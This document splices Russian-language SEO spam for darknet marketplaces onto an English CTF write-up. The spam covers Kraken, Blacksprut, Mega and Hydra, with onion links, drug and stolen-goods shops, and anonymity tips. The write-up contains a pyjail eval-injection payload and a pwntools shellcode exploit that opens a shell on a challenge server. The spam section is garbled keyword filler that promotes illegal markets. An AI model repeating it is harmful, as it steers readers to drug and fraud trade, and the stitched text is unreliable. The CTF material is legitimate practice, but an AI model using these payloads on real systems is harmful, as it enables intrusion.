2krn at krakendark link

После этого пользователь может свободно посещать onion ресурсы, которые нельзя открыть через обычный веб-обозреватель. И интернет в таких условиях сложнее нарушить чем передачу на мобильных устройствах. Также многие используют XMR, считая ее самой безопасной и анонимной. Org, список всех.onion-ресурсов от Tor Project. Скорость работы friGate обеспечена тем, что он открывает заблокированные сайты из собственного заранее составленного списка. IP адрес сервера: Имя сервера: apache/2.2.22 Расположение сервера: Saint Petersburg 66 в Russian Federation Кодировка: UTF-8 Расположение сервера Сервер обслуживающий этот сайт географически расположен: Saint Petersburg 66 в Russian Federation IP адрес сайта. Onion - Fresh Onions, робот-проверяльщик и собиратель.onion-сайтов. Максим Пользователь. Onion - ProtonMail достаточно известный и секурный имейл-сервис, требует JavaScript, к сожалению ozon3kdtlr6gtzjn. Этот сайт содержит 2 исходящих ссылок. Sblib3fk2gryb46d.onion - Словесный богатырь, книги. Источник Источник. Если вы используете импланты MegaGen AnyOne, покупайте изделия, совместимые с МегаГен. Org,.onion зеркало торрент-трекера, скачивание без регистрации, самый лучший трекер, заблокированный в России на вечно ). Форум это отличный способ пообщаться с публикой сайта, здесь можно узнать что необходимо улучшить, что на сайте наркотики происходит не так, так же можно узнать кидал, можно оценить качество того или иного товара, форумчане могут сравнивать цены, делиться впечатлениями от обслуживания тем или иным магазином. Если вы часто посещаете один или несколько онион площадок, но загружать на компьютер Тор не хотите, то установите специальное расширение. Веб-обозреватель имеет открытый исходный код и свободно распространяется, поэтому на просторах сети Интернет можно встретить разные сборки, порошок версии. Конечно же, неотъемлемой частью любого хорошего сайта, а тем более великолепной Меге является форум. Спустя сутки сообщение пропало: судя по всему, оно было получено адресатом. Onion - Tchka Free Market одна из топовых зарубежных торговых площадок, работает без пошлины. Здесь можно ознакомиться с подробной информацией, политикой конфиденциальности. Bpo4ybbs2apk4sk4.onion - Security in-a-box комплекс руководств по цифровой безопасности, бложек на английском. Леха Кислый Пользователь Нашел данный сайт через Гугл по запросу: Mega ссылка. На Hydra велась торговля наркотиками, поддельными документами, базами с утечками данных и другими нелегальными товарами. Сохраненные треды с сайтов. При желании прямо в окне распаковщика меняем местоположение на то, куда нам хочется, и продолжаем давить кнопку «Далее» (Next) до конца распаковки. 3дрaвcтвуйте! Максимальное количество ссылок за данный промежуток времени 0, минимальное количество 0, в то время как средее количество равно. Изредка по отношению к некоторым вещам это желание вполне оправдано и справедливо, однако чаще всего - нет. Hydra или «Гидра» крупнейший российский даркнет-рынок по торговле, крупнейший в мире ресурс по объёму нелегальных операций с криптовалютой. Мета Содержание content-type text/html;charsetUTF-8 generator 22 charset UTF-8 Похожие сайты Эти веб-сайты относятся к одной или нескольким категориям, близким по тематике. Как только будет сгенерировано новое зеркало Mega, оно сразу же появится здесь. Onion - Tor Metrics статистика всего TORа, посещение по странам, траффик, количество onion-сервисов wrhsa3z4n24yw7e2.onion - Tor Warehouse Как утверждают авторы - магазин купленного на доходы от кардинга и просто краденое. Он пропускает весь трафик пользователя через систему Tor и раздаёт Wi-Fi. В расследовании, выпущенном журналистами «Ленты было рассказано, что на уничтожение ramp в известной степени повлияли администраторы Hydra. Hydra поддержка пользователей. Вся серверная инфраструктура "Гидры" была изъята, сейчас мы занимаемся восстановлением всех функций сайта с резервных серверов написала она и призвала пользователей «Гидры» не паниковать, а магазинам посоветовала не искать альтернативные площадки. Им оказался бизнесмен из Череповца. Гарантия возврата! Ещё одним решением послужит увеличение вами приоритета, а соответственно комиссии за транзакцию, при переводе Биткоинов. Добавить комментарий. Способ актуален для всех популярных браузеров на основе Chromium (Google, Yandex.д. Самый актуальный каталог теневых форумов и даркнет ресурсов, вся актуальная информация на 2022 год. Турбо-режимы браузеров и Google Переводчик Широко известны способы открытия заблокированных сайтов, которые не требуют установки специальных приложений и каких-либо настроек. Без воды. Ссылку нашёл на клочке бумаги, лежавшем на скамейке. Возможные причины блокировки: единый реестр доменных имен, указателей страниц сайтов в сети «Интернет» и сетевых адресов, содержащие информацию, распространение которой в Российской Федерации запрещено. 2qrdpvonwwqnic7j.onion - IDC Italian DarkNet Community, итальянская торговая площадка в виде форума. Onion сайтов без браузера Tor ( Proxy ) Просмотр.onion сайтов без браузера Tor(Proxy) - Ссылки работают во всех браузерах.
2krn at krakendark link - Kraken clear ссылка
Onion/ (Music) http bpo4ybbs2apk4sk4.onion/ru/ (Цифровая безопасность) http mystorea4mbkgt76.onion (cайты на заказ) http qubesos4rrrrz6n4.onion/ (Безопасная OS) http rrydrab7aba7hilt. ЦРУ Основная причина, по которой ВМС США создали Tor, заключалась в том, чтобы помочь информаторам безопасно передавать информацию через Интернет. Будьте уверены, что на Blacksprut вы можете совершать любые операции в абсолютной безопасности и анонимности. Мега Официальный сайт - крупнейшая в СНГ торговая площадка даркнета. Автопродажи 24/7. Биткоинов (примерно 108 млн долларов по сегодняшнему курсу). Так вот, он постоянно мне рассказывал о том, что он там себе кали поставил, хуй его найдешь теперь, то он там себе какой-то ноут защищенный купил, то еще какую-то херню. Мы являемся одной из самых крупных площадок СНГ. Однако их размер прямо зависит от количества времени, отведенного на удержание заемных средств. Onion Бразильчан Зеркало сайта brchan. Ссылка на сайт blacksprut com находится на данном сайте и постоянно обновляется. The Блэкспрут площадка is filled with quality products and services. Помните, что денежные переводы в биткоине необратимы. Ссылка на Blacksprut ; Тор маркет BlackSprut. Существует еще один уровень обеспечения безопасности, которым управляете вы,. Сотрудники службы безопасности маркетплейса делают все необходимое, чтобы ссылки на сайт Гидры были защищенными от отслеживания, взлома и как зайти на сайт гидра рассекречивания третьими лицами. Официальный сайт Blacksprut не имеет проблем со стабильной работой в зоне onion. Все, что вам нужно - это просто перейти по указанным зеркалам и ссылкам. Свежи ссылки на блэкспрут, новости и акции маркетплейса. Blacksprut сайт предоставляет огромный выбор магазинов, товаров и услуг. Я это честно рассказываю, потому что хочу показать, как наркотики меняют личность человека, как зайти на сайт гидра сжирают не только тело, организм, но все принципы, нравственные установки. Это скрытый Интернет, причем намеренно. Чем больше людей используют ваш код, тем больше вы можете получить. Все это делает наблюдение за даркнетом со стороны правоохранительных органов еще более сложным. Поехали! Blacksprut ссылка. И многое другое ждет тебя на площадке - маркетплейсе blacksprut.

This is my write-up for recent hack you spb CTF - a CTF for newbies. I guess I'm a bit older here ahaha.Reverse 100:#include <stdio.h>#include <string.h>int main() { char buf[64]; gets(buf); int l = strlen(buf); if (l * l != 144) return 1; unsigned int a = buf[0] | (buf[4] << 8) | (buf[8] << 16); unsigned int b = buf[1] | (buf[5] << 8) | (buf[9] << 16); unsigned int c = buf[2] | (buf[6] << 8) | (buf[10] << 16); unsigned int d = buf[3] | (buf[7] << 8) | (buf[11] << 16); if (!(((a % 3571) == 2963) && (((a % 2843) == 215)) && (((a % 30243) == 13059)))) return 2; if (!(((b % 80735) == 51964) && (((b % 8681) == 2552)) && (((b % 40624) == 30931)))) return 3; if (!(((c % 99892) == 92228) && (((c % 45629) == 1080)) && (((c % 24497) == 12651)))) return 4; if (!(((d % 54750) == 26981) && (((d % 99627) == 79040)) && (((d % 84339) == 77510)))) return 5; printf("Congratulations %s is flag\n",buf); return 0;}First of all, I think about use something like z3, or any SAT that could give me the valid number. But z3 took a lot of time, so I decided to look deeper... Yes, you could finger out there is a pattern (x % number1 == number2), so you could apply Chinese remainder theorem to get a, b, c.Reverse 200:
This is a .pyc file, which is a file contain python byte-code. As usual, for byte-code relative problems, I search for some python byte-code decompiler and found pycdc.
After decompil, you should get something like this# Source Generated with Decompyle++# File: rev200_bot_7b541a1.pyc (Python 2.7)import configimport tracebackimport refrom base64 import *from twx.botapi import TelegramBot, ReplyKeyboardMarkup, ReplyKeyboardHidesec_state = { }def process_message(bot, u):Warning: Stack history is not empty! if u.message.sender and u.message.text and u.message.chat: chat_id = u.message.chat.id user = u.message.sender.username reply_hide = ReplyKeyboardHide.create() print 'user:%s mes:%s' % (user, u.message.text) if user not in sec_state: sec_state[user] = { 'mode': 15, 'stage': 7 } cmd1 = u.message.text.encode('utf-8') a = re.findall('(\\/\\w+)\\s*(.*)', cmd1) if a: cmd = a[0][0] data = a[0][1] if cmd == '/help': bot.send_message(chat_id, 'Usage: \n\n/help - show this help\n/enter - enter secret mode\n', reply_markup = reply_hide) if cmd == '/enter': keyboard = [ [ '-7-', '-8-', '-9-'], [ '-4-', '-5-', '-6-'], [ '-1-', '-2-', '-3-'], [ '-0-']] reply_markup = ReplyKeyboardMarkup.create(keyboard) bot.send_message(chat_id, 'please enter access code', reply_markup = reply_markup).wait() if sec_state[user]['mode'] == 0 and cmd == '/7779317': ddd = b64decode(data) bot.send_message(chat_id, eval(ddd)) a = re.findall('-(\\d+)-', cmd1) if a: num = a[0] if int(num) == sec_state[user]['stage']: sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: bot.send_message(chat_id, 'Secret mode enabled!', reply_markup = reply_hide).wait() else: print 'NO', num, sec_state[user]['stage'] bot.send_message(chat_id, 'Invalid password!', reply_markup = reply_hide).wait() sec_state[user]['mode'] = 15 bot = TelegramBot(config.token)bot.update_bot_info().wait()print bot.usernamelast_update_id = 0while True: updates = bot.get_updates(offset = last_update_id).wait() try: for update in updates: if int(update.update_id) > int(last_update_id): last_update_id = update.update_id process_message(bot, update) continue continue except Exception: ex = None print traceback.format_exc() continue So this is a kind of chat-bot server based on Telegram.
There is eval function inside, bot.send_message(chat_id, eval(ddd)), so I need to control ddd which is a base64 decoded string from data we sent. Before that, I need to enter Secret mode by enter correct access code (0-9).
First, set sec_state[user]['mode'] = 0; First time, stage init to 7, that changed everytime you press the correct key; But if I dont remember the stage, I still could find out by bruteforce from 0 to 9, if I didn't recv incorrect message that's mean I pressed the correct one; then by use the following script, I'm able to access secret area;#coding: utf-8sec_state = { }user = "A"sec_state[user] = {'mode': 15,'stage': 7 } # bruteforce numbersec_state[user]['mode'] = 15r = []while 1: num = sec_state[user]['stage'] r.append(num) print "-%d-" % num sec_state[user]['stage'] = (sec_state[user]['stage'] * sec_state[user]['stage'] ^ 1337) % 10 sec_state[user]['mode'] = sec_state[user]['mode'] - 1 if sec_state[user]['mode'] < 0: sec_state[user]['mode'] = 0 if sec_state[user]['mode'] == 0: breakprint sec_state[user]['mode']Next, this is a pyjail, so I can't execute normal python command...
So, final payload is `str(().__class__.__base__.__subclasses__()[40]("flag","r").read())`or `/7779317 c3RyKCgpLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzQwXSgiZmxhZyIsInIiKS5yZWFkKCkp`Reverse 300:
Let's get some fun.let reverse this (or not?), look at handler (the main function)ssize_t __cdecl handler(int fd){ ssize_t result; // [email protected] unsigned int buf; // [sp+20h] [bp-18h]@1 int v3; // [sp+24h] [bp-14h]@1 char *v4; // [sp+28h] [bp-10h]@4 int v5; // [sp+2Ch] [bp-Ch]@4 buf = 0; setuid(0x3E8u); seteuid(0x3E8u); setgid(0x3E8u); setegid(0x3E8u); result = recv(fd, &buf, 4u, 0); v3 = result; if ( result == 4 ) { result = buf; if ( buf <= 0xC8 ) { v4 = (char *)mmap(0, buf, 7, 33, -1, 0); v3 = recv(fd, v4, buf, 0); result = crc32(0, v4, buf); v5 = result; if ( result == 0xCAFEBABE ) { result = filter(v4, buf) ^ 1; if ( !(_BYTE)result ) result = ((int (*)(void))v4)(); } } } return result;}So the basic idea is make result == 0xCAFEBABE, so the program will execute v4 as shellcode (function pointer), but you also need to bypass the filter function - check if contain any of 0x0, 0x1, 0x2f, 0x68, 0x73 ( so I can't use sh in plaintext)then exit; So, I did the following step:1. Find a program that can make crc32 of my shellcode equal 0xCAFEBABE
2. Make a great shellcode and Bypass filter.
By search google for everything, the answer for problem 1 is force-crc32.
Currently I'm also trying to learn some binary exploit method, write a shellcode isn't hard (hint xor), but if there is any framework that's good enough as pwntools , you shoud try at least once.
Basicaly, I import pwns and let pwntools do the rest;from pwn import *import socket, struct, telnetlibdef getCRC(data): import subprocess with open('/tmp/12', 'wb') as f: f.write(data + "123456") subprocess.check_output(['python', 'forcecrc32.py', '/tmp/12', str(len(data)+1) , 'CAFEBABE']) with open('/tmp/12', 'rb') as f: data = f.read() return datadef crc32(data):# recheck import zlib return (zlib.crc32(data)) & 0xffffffffd = ""d += asm(pwnlib.shellcraft.i386.linux.dup2(4,0))d += asm(pwnlib.shellcraft.i386.linux.dup2(4,1))# i need dup2 because the program use itself as serverd += asm(pwnlib.shellcraft.i386.linux.sh())fsc = pwnlib.encoders.encoder.encode(d, '\n\x01\0\x2f\x73\x68')print len(fsc)fsc = getCRC(fsc) # it didn't contain any blocked char, so i dont need to re-generate again.print hex(crc32(fsc))#yes, i love my custom socket lib 🙁s = socket.create_connection(("78.46.101.237", 3177))s.send(p32(len(fsc)))s.send(fsc)s.send("\n")s.send("cat flag*\n") print s.recv(1024)To be continued....Related